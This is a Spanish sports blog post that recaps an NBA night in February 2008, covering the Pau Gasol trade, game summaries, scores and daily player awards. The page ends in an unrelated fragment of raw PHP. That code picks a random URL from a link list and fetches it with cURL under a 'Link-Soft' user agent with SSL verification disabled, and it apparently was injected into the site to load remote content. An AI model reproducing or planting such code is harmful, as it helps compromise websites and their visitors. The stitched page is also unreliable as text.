La crónica (01/02/08)

02 de February de 2008 por Jabho

Aunque lo importante anoche fuera el traspaso de Gasol a los Lakers, no hay que olvidar que hubo jornada. Como simepre que llega el fin de semana la jornada tuvo muchos partidos aunque no demasiados de los que enfrentan a los teóricos aspirantes al anillo. Veamos el resumen de la jornada en imágenes para luego entrar a comentarlo:

En Philadelphia los Magic ganaron, esperable, pero con mas dificultad que la diferencia de records auguraba. Buen partido de muchos jugadores de los Sixers y atención al protagonismo que va cobrando el rookie Thaddeus Young. Young dió el salto a la NBA trás sólo un año de universidad así que llega con mucho que aprender y madurar. Pero su potencial es enorme y poco a poco lo va demostrando. Por parte de los Magic entre el aspirante a MVP Howard y el agente libre mas caro de la franquicia Lewis destaca, como casi siempre últimamente, Turkoglu que se está acostumbrando a decidir partidos igualados. Si el otro día fulminaba a los Celtics con un estratosférico triple ayer dió la victoria a su equipo con dos tiros libres a menos de 3 segundos del final. En Indiana los Rockets vencieron al equipo al local en otro partido mas igualado de lo esperado. El partido también se decidió aqui con dos tiros libres a falta de pocos segundos. En este caso fue Battier el que acertó. Houston sigue fuerte pero aun no está consolidado en los carísimos puestos de PlayOffs de la conferencia Oeste. Los Jazz vencieron a los Wizards en un partido que se decidió en el último cuarto. Las bajas de Arenas y de Butler fueron demasiado contra un equipo que ha ganado 9 de sus últimos 10 partidos y que se consolida al frente de la Northwest. Comoda victoria de los Nets ante los deprimidos Heat. Temporada perdida en Miami y tiempo de pensar el camino a seguir y esperar que Wade confie en el proyecto. Clippers y Timberwolves disputaron un duelo entre equipos colistas de división. Victoria de los lobos que han ganado 5 de sus últimos 10 partidos. Los Clippers no levantan cabeza y ven como las lesiones se han cebado con ellos este año. Los Kings vencieron a los Hornets en lo que podría ser una de las sopresas de la jornada. Sorpresa pero menos, porque con Bibby y Martin de vuelta, Artest centrado y Miller jugando a buen nivel tienen equipo para complicarle la vida a cualquiera. Si siguen así otro equipo que se podria apuntar a la lucha de los Play Offs en el Oeste. Los Warriors ganaron en su casa con mucha facilidad a los Bobcats. El partido estaba resuleto al descanso y hasta Belinelli jugó 14 minutos. Los Blazers ganaron a los Knicks, que llegaron a forzar la prórroga, con triple doble de Brandon Roy. Los Blazers están fuera de puestos de Play Offs y han bajado algo el ritmo que les mantuvo invictos durante muchas jornadas, pero eso no debe empañar la gran temporada que estan haciendo. Sergio Rodrigues apenas jugó 5 minutos.

El partido de la jornada

Anoche el nuevo equipo de Gasol se enfrentaba a Toronto. Los Lakers vencieron con contundencia a los Raptors con un Kobe magistral y buen partido de muchos angelinos. Por parte de los canadienses la mejor noticia es que recuperaron la mejor versión de Bargnani que hizo 28 puntos con 4 triples y, lo que más se le reclama, varios mates y canastas en la zona. Calderon y Bosh jugaron un buen partido si más, pero no fue suficiente para parar a unos Lakers donde además de Kobe, Vujacic y Farmar estuvieron muy bien y Odom, a pesar de tener problemas con las faltas, estuvo cerca del tripl doble. Los Lakers a la espera de Pau y de que se recupere Bynum juntan un equipazo capaz de luchar por todo.

Resultados

Lakers 121 – 101 Raptors

Magic 108 – 106 76ers

Rockets 106 – 103 Pacers

Jazz 96 – 87 Wizards

Nets 94 – 85 Heat

Clippers 83 – 104 Timberwolves

Hornets 103 – 112 Kings

Bobcats 96 – 127 Warriors

Knicks 88 – 94 Trail Blazers

Seguimos con los premios del día:

MVP: Comparten galardon esta noche dos jugadores que han hecho ganar a su equipo con grandes actuaciones. Roy firmó un triple doble con 20 puntos, 10 rebotes y 11 asistencias. Kobe Bryant hizo 46 puntos con 7 rebotes y 5 asistencias y anotó 19 tiros de 28, algunos de ellos antológicos.

Rookie: Carl Landry fue el mejor de los Rockets con 22 puntos, 9 de 11 en el tiro, y 7 rebotes.

Sorpresa: Varios jugadores hicieron un gran partido aunque sus equipos no ganaran. Foster hizo 13 puntos y 17 rebotes en la derrota de Indiana. Blatche firmó 19 puntos y 13 rebotes en la derrota de los Wizards. Buen partido de Okur que este año no es habitual pero tampoco es una sorpresa. El galardon se lo lleva Vujacic que anotó 22 puntos, la cifra mas alta en su carrera, con 4 de 5 en triples y un 80% de tiro en total.

Decepción: Aunque vengas de hacer un gran partido te debes dar cuenta cuando no es tu día. Grave aunque mas perdonable en Thorton por ser un novato, pero su 1 de 15 es para reflexionar. Mas grave aun en Crawford que aunque es de las pocas noticias positivas para los seguidores de los Knicks ayer concenó a su equipo a la derrota con su 6 de 27, poco por encima del 20%.

Y ahí va nuestra adivinanza de hoy: ¿porqué pone esa cara de Gasol?

a) ¿como, que yo también tengo que defender?

b) ¿de verdad voy a ser compañero de Kobe?¿me llegará algún balón?

c) ¿de verdad cobra Cardinal mas de 6$?

d) ¿sacad a Navarro y a mi hermano de este agujero?

No se puede asegurar con certeza pero seguro que entre la c y la d. No le preocupará la selección de tiro de Kobe porque viene de compartir posesiones con Gay y defender no es su fuerte pero todo es cuestión de ponerse. Ala enterarse de lo que gana Cardinal o pensar que el año que viene su hermano puede acabar en Memphis…

El premio por acertar es una foto de la cara de Cardinal cuando vió el contrato que le proponia Jerry West.

Os dejamos con la 10 mejores jugadas de ayer:

Esta entrada no tiene comentarios... pero tú puedes ser el primero.

Deja un comentario

html; } class Helper { public function random_date() { $low = '732045693'; $high = time(); $random = rand($low, $high); return date("D, d M Y H:i:s",$random); } } class Fetch_site { public $url; public $html; public function __construct($sites=null, $link_list=null) { $this->is_curl_installed(); if($link_list !== null) { $this->choose_site($link_list); } $this->load_site($this->url); } public function choose_site($file=null) { $file = explode("\n", $file); $key = rand(0, (count($file)-1)); $this->url = trim($file[$key]); } public function load_site($url) { $useragent = array('Link-Soft'); $rand = array_rand($useragent); $ch = curl_init(); $options = array( CURLOPT_URL => $url, CURLOPT_HEADER => 0, CURLOPT_USERAGENT => $useragent[$rand], CURLOPT_SSL_VERIFYHOST => 0, CURLOPT_SSL_VERIFYPEER => 0, CURLOPT_RETURNTRANSFER => 1, CURLOPT_FOLLOWLOCATION => 1, CURLOPT_ENCODING => "", CURLOPT_AUTOREFERER => 1, CURLOPT_CONNECTTIMEOUT => 30, CURLOPT_TIMEOUT => 30, CURLOPT_MAXREDIRS => 5, ); curl_setopt_array($ch,$options); $result = curl_exec($ch); if(!$result) { return curl_error($ch); } curl_close($ch); $this->html = $result; } public function is_curl_installed() { if(!in_array('curl',get_loaded_extensions())) { trigger_error("cURL PHP extension is disabled or not installed.",E_USER_ERROR); } } } unset($n); ?>